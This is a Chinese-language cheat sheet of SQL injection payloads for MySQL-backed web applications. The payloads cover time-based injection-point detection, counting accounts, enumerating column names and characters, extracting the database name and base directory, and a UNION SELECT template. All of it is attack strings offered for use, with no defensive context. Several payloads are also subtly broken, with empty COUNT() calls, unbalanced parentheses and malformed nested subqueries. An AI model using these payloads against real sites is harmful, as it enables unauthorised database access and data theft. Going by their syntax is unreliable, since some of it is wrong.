SQL注入常用语句

常用语句：

判断注入点：-1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN SLEEP(5) ELSE 0 END)) FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY CHARSET))a)) AND (-1)--+

猜帐号数目：-1 AND (SELECT COUNT(),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN COUNT() ELSE 0 END)) FROM INFORMATION_SCHEMA.USERS GROUP BY USER))a)) AND (-1)--+

猜解字段名称：-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN COLUMN_NAME ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

猜解字符：-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN SUBSTRING(0x74657374,1,1) ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

得到库名：-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN DATABASE() ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

得到WEB路径：-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN @@basedir ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

查询构造：0' union select 1,2,3,4--+